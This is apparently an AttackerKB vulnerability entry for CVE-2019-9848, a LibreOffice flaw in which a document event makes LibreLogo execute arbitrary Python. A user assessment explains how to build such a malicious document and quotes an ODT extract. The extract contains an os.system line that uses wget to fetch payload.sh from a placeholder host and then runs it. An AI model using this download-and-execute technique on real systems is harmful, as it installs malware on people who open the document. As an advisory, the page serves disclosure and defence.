Very Low
CVE-2019-9848
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below:
Add References:
CVE-2019-9848
MITRE ATT&CK
Collection
Command and Control
Credential Access
Defense Evasion
Discovery
Execution
Exfiltration
Impact
Initial Access
Lateral Movement
Persistence
Privilege Escalation
Topic Tags
Description
LibreOffice has a feature where documents can specify that pre-installed scripts can be executed on various document events such as mouse-over, etc. LibreOffice is typically also bundled with LibreLogo, a programmable turtle vector graphics script, which can be manipulated into executing arbitrary python commands. By using the document event feature to trigger LibreLogo to execute python contained within a document a malicious document could be constructed which would execute arbitrary python commands silently without warning. In the fixed versions, LibreLogo cannot be called from a document event handler. This issue affects: Document Foundation LibreOffice versions prior to 6.2.5.
Add Assessment
Ratings
-
Attacker ValueVery Low
-
ExploitabilityMedium
Technical Analysis
This forms the basis of a social engineering attack, It requires libre office and python installed. This means it is a limited pool of targe victims. However this is a common setup on Linux desktop environments which may make developers a target.
To exploit this vulnerability, an attacker creates a document with a text-written command and a hyperlink that, upon user mouseover, runs a program through the LibreLogo extension. When a user loads up the document in a program such as LibreOffice Writer, the macro is enabled automatically.
The hyperlink is set to include the macro LibreLogo:run. This in turn runs the previous text command through LibreLogo as if it’s attempting to use the information to create turtle vector graphics. This causes whatever is being called in the text command to run – be it malware, a program, or a malicious file download.
An example extract from an odt file can be seen below
<txt ptr="0x4e9a180" id="3" symbol="11SwTextFrame" next="10" upper="2" txtNodeIndex="9"> <infos> <bounds left="8181" top="1418" width="9638" height="299" mbFixSize="false" mbValidPos="true" mbValidSize="true" mbValidPrtArea="true"/> <prtBounds left="0" top="0" width="9638" height="299"/> </infos> import os <Text nLength="9" nType="POR_PARA" nHeight="299" nWidth="989" Portion="import os"/> <LineBreak nWidth="989" Line="import os"/> <Finish/> </txt> <txt ptr="0x7c6e450" id="10" symbol="11SwTextFrame" next="15" prev="3" upper="2" txtNodeIndex="10"> <infos> <bounds left="8181" top="1717" width="9638" height="598" mbFixSize="false" mbValidPos="true" mbValidSize="true" mbValidPrtArea="true"/> <prtBounds left="0" top="0" width="9638" height="598"/> </infos> os.system(“wget http://immersivemalware.bad:8001/payload.sh ; chmod +x payload.sh ; ./payload.sh”) <Text nLength="84" nType="POR_PARA" nHeight="299" nWidth="9264" Portion="os.system(“wget http://malware.bad:8001/payload.sh ; chmod +x payload.sh ; "/> <LineBreak nWidth="9264" Line="os.system(“wget http://malware.bad:8001/payload.sh ; chmod +x payload.sh ; "/> <Text nLength="14" nType="POR_LAY" nHeight="299" nWidth="1458" Portion="./payload.sh”)"/> <LineBreak nWidth="1458" Line="./payload.sh”)"/> <Finish/> </txt> <txt ptr="0x4e2ac00" id="15" symbol="11SwTextFrame" prev="10" upper="2" txtNodeIndex="11"> <infos> <bounds left="8181" top="2315" width="9638" height="299" mbFixSize="false" mbValidPos="true" mbValidSize="true" mbValidPrtArea="true"/> <prtBounds left="0" top="0" width="9638" height="299"/> </infos> Run <Text nLength="3" nType="POR_PARA" nHeight="299" nWidth="434" Portion="Run"/> <LineBreak nWidth="434" Line="Run"/> <Finish/> </txt>
Would you also like to delete your Exploited in the Wild Report?
Delete Assessment Only Delete Assessment and Exploited in the Wild ReportCVSS V3 Severity and Metrics
General Information
Vendors
- canonical,
- debian,
- fedoraproject,
- libreoffice,
- opensuse
Products
- debian linux 8.0,
- fedora 29,
- fedora 30,
- leap 15.0,
- leap 15.1,
- libreoffice,
- ubuntu linux 16.04,
- ubuntu linux 18.04,
- ubuntu linux 19.04
References
Advisory
Additional Info
Technical Analysis
Report as Exploited in the Wild
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below: